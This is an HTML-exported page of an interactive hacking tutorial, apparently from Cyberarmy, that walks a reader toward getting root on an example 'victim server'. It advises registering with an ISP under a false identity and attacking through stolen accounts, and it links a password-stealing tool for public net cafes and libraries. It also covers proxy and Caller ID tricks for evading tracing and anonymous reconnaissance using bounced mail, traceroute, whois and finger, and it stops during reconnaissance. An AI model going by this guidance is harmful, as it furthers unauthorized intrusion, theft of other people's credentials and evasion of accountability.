panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1593833729 1073750107 16 0 415 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0cm;
margin-right:0cm;
margin-bottom:10.0pt;
margin-left:0cm;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:10.0pt;
line-height:115%;}
@page Section1
{size:612.0pt 792.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:36.0pt;
mso-footer-margin:36.0pt;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style> </div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"><u>at the Start</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>I Want to Go Straight to Hacking</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">INTRODUCTION:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"><br />
A little background is needed before we get into hacking techniques.<br />
<br />
When we talk about ‘Hacking’, we are talking about getting some access on a server we shouldn’t have. Servers are set up so that many people can use them. These people each have different ‘accounts’ on the server – like different directories that belong just to them. If Fred has an account with the froggy.com.au ISP (Internet Service Provider), he will be given:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">(1) a login name, which is like the name of your directory; and<br />
(2) a password, which lets you get access to that directory.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">This login name and password will usually give you access to all of Fred’s services - his mail, news services and web pages. There is also the ‘root’ account, which has it’s own login and password. This gives super-user access to the entire server. We will focus on ‘getting root’, in this help file.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><br />
</div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, I want to move to the 'anatomy of the hack</u>']</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>I know all this, let me move straight to hacking</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u><br />
</u>I don't have a clue what you're on about, let me read some backgroundon this so called "Internet" you keep referring to <http: htext1.shtml="" tute="" www.cyberarmy.com="">]</http:></span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE ANATOMY OF THE 'HACK':</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">There are two main ways to break into a system. Think of a server as a Swiss Bank Vault. There are two main ways to get in. You can try to get in by finding the combination of the vault. This is like finding the password. It’s how you are meant to get in. The second way is by using dynamite. You forget all about the ‘proper’ way to get in. This is like using ‘exploits’, or weaknesses in the servers operating system to gain access.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><img height="40" src="file:///C:/DOCUME%7E1/NET_ST%7E1/LOCALS%7E1/Temp/msohtmlclip1/01/clip_image002.gif" v:shapes="_x0000_i1027" width="120" /></span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, Let's Go. Tell Me About Not Getting Caught</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Stuff it, I know how to not get caught, on to the techniques!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">'DON'T GET CAUGHT':</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"><br />
Hacking is illegal, and it is very easy to trace you if froggy.com.au realizes you hacked them. Wherever you go, <br />
your IP number (your computer’s unique identification) is left and often logged. Solutions:<br />
<br />
1. When you set up your account with an ISP, give a false name and address.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><img height="40" src="file:///C:/DOCUME%7E1/NET_ST%7E1/LOCALS%7E1/Temp/msohtmlclip1/01/clip_image002.gif" v:shapes="_x0000_i1028" width="120" /></span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, I can't be bothered, what other things can I do?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, I used this trick. What else can I do?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Stuff it, I know how to not get caught, on to the techniques!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">'DON'T GET CAUGHT':</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">2. Hack using a filched account (stolen password, etc.). A tool called <u>Dripper <http: dripper.zip="" files="" www.cyberarmy.com=""></http:></u> can steal passwords for you from public net cafes and libraries.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Nah, just tell me something easy I can do right now</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, done. Anything else I should do?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">'DON'T GET CAUGHT':</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">3. Port your connection through something else.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">An easy way to do this is to change your proxy settings. By using the proxy settings meant for a different ISP, it can look like you are surfing from wherever that ISP is. A list of proxies you can use is <u>here <http: lists="" proxy="" www.cyberarmy.com=""></http:></u>.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">You should also do any important info gathering through the IP Jamming Applet on the <u>Cyberarmy.Com <http: www.cyberarmy.com=""></http:></u> to hide your IP.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">If you want super anonymity, you should be surfing in an account you set up under a false name, with your proxy settings changed, and also surfing through the IP Jamming applet! Be aware that some ISPs could use Caller ID to test the number of someone logging on. Dial the relevant code to disable Caller ID before calling your ISP.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>I don't understand about the proxy settings thing, let me read more <http: htext3.shtml="" tute="" www.cyberarmy.com=""></http:></u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, I am wired for hyper stealth... Now, I want to HACK!</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">INFO GATHERING:<br />
<br />
To start off, you will probably need to gather information about www.froggy.com.au using internet tools.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, how?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Give me some reading to do about info gathering <http: htext2.shtml="" tute="" www.cyberarmy.com=""></http:></u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>No, I've already got all the info, just tell me what to do</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">DIRT DIGGING STAGE:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">We are now taking the first steps of any hack... Info Gathering.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">You should be set up for stealth mode. Get a notepad, and open a new browser window (through the IP Jammer). Bring the www.froggy.com.au 's web page up in the IP Jammer's window. You can load the IP Jamming applet on the <u>Cyberarmy.Com <http: www.cyberarmy.com=""></http:></u>.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, What Now?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">CASE THE JOINT:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">1. First, check out the site. Take down any email addresses, copy down the HTML of important pages.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Done... What Else?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">THE OLD BOUNCING MAIL TRICK:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">2. Send a mail that will bounce to the site. If the site is www.froggy.com.au , send a mail to blahblahblah@froggy.com.au . It will bounce back to you and give you information in its header.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">Copy the information from the headers down.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">(To maintain anonymity, it might be a good idea to send and receive the mail from a free web based provider, such as hotmail.com. Use full stealth features when sending the bouncing mail. This will protect you when they check through the logs after they are hacked.)</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Done... What Else?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">TRACEROUTE:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">3. Still using stealth features, Traceroute froggy.com.au . This Traceroute search is avaliable from the Hacker's Home Page, in the Net Tools section.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">This will tell you the upstream provider of the victim server.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div style="border-color: -moz-use-text-color -moz-use-text-color black; border-style: none none double; border-width: medium medium 1.5pt; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Top of Form 1<o:p></o:p></span></div></div><div align="center" style="color: #eeeeee;"><table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: medium none;"><tbody>
<tr> <td style="border: medium none; padding: 0cm; width: 150.75pt;" valign="top" width="201"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Verdana","sans-serif"; font-size: 12pt;">TOOLS</span><span style="font-family: "Verdana","sans-serif"; font-size: 12pt;"> </span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"> </span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> <td style="border: medium none; padding: 0cm; width: 152.25pt;" valign="top" width="203"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><br />
</div></td> <td style="border: medium none; padding: 0cm; width: 84.75pt;" valign="top" width="113"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> </tr>
</tbody></table></div><div style="border-color: black -moz-use-text-color -moz-use-text-color; border-style: double none none; border-width: 1.5pt medium medium; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Bottom of Form 1<o:p></o:p></span></div></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, what next?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">WHOIS:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">3. Still using stealth features, Whois the site. This Whois search is avaliable from the Hacker's Home Page, in the Net Tools section.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">This will give you information on the owners and servers that run the site. Write it down.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div style="border-color: -moz-use-text-color -moz-use-text-color black; border-style: none none double; border-width: medium medium 1.5pt; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Top of Form 2<o:p></o:p></span></div></div><div align="center" style="color: #eeeeee;"><table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: medium none;"><tbody>
<tr> <td style="border: medium none; padding: 0cm; width: 150.75pt;" valign="top" width="201"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Verdana","sans-serif"; font-size: 12pt;">TOOLS</span><span style="font-family: "Verdana","sans-serif"; font-size: 12pt;"> </span><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;"> </span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> <td style="border: medium none; padding: 0cm; width: 152.25pt;" valign="top" width="203"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><br />
</div></td> <td style="border: medium none; padding: 0cm; width: 84.75pt;" valign="top" width="113"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> </tr>
</tbody></table></div><div style="border-color: black -moz-use-text-color -moz-use-text-color; border-style: double none none; border-width: 1.5pt medium medium; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Bottom of Form 2<o:p></o:p></span></div></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, what next?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
</div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">GIVE 'EM THE FINGER:</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">4. Finger the site. Use this finger service at Cyberarmy.Com to check the site. Try fingering just with “finger @froggy.com.au ” first. This sometimes tells you the names of all accounts. If this does not work, try fingering any email addresses you found on the site, and through Whois. This will sometimes give you useful information.</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div style="border-color: -moz-use-text-color -moz-use-text-color black; border-style: none none double; border-width: medium medium 1.5pt; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Top of Form 3<o:p></o:p></span></div></div><div align="center" style="color: #eeeeee;"><table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: medium none;"><tbody>
<tr> <td style="border: medium none; padding: 0cm; width: 106.6pt;" valign="top" width="142"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Verdana","sans-serif"; font-size: 12pt;">FINGER</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"> </span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> <td style="border: medium none; padding: 0cm; width: 87.4pt;" valign="top" width="117"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><br />
</div></td> <td style="border: medium none; padding: 0cm; width: 87.4pt;" valign="top" width="117"><div class="MsoNormal" style="line-height: normal; margin-bottom: 0.0001pt;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div></td> </tr>
</tbody></table></div><div style="border-color: black -moz-use-text-color -moz-use-text-color; border-style: double none none; border-width: 1.5pt medium medium; color: #eeeeee; padding: 0cm;"><div align="center" class="MsoNormal" style="border: medium none; line-height: normal; margin: 5pt 0cm; padding: 0cm; text-align: center;"><span style="display: none; font-family: "Arial","sans-serif"; font-size: 8pt;">Bottom of Form 3<o:p></o:p></span></div></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Arial","sans-serif"; font-size: 10pt;"><br />
</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm; text-align: center;"><span style="font-family: "Verdana","sans-serif"; font-size: 9pt;">[<u>Ok, what next?</u>]</span><span style="font-family: "Times New Roman","serif"; font-size: 12pt;"><o:p></o:p></span></div><div class="MsoNormal" style="color: #eeeeee; line-height: normal; margin: 5pt 0cm;"><br />
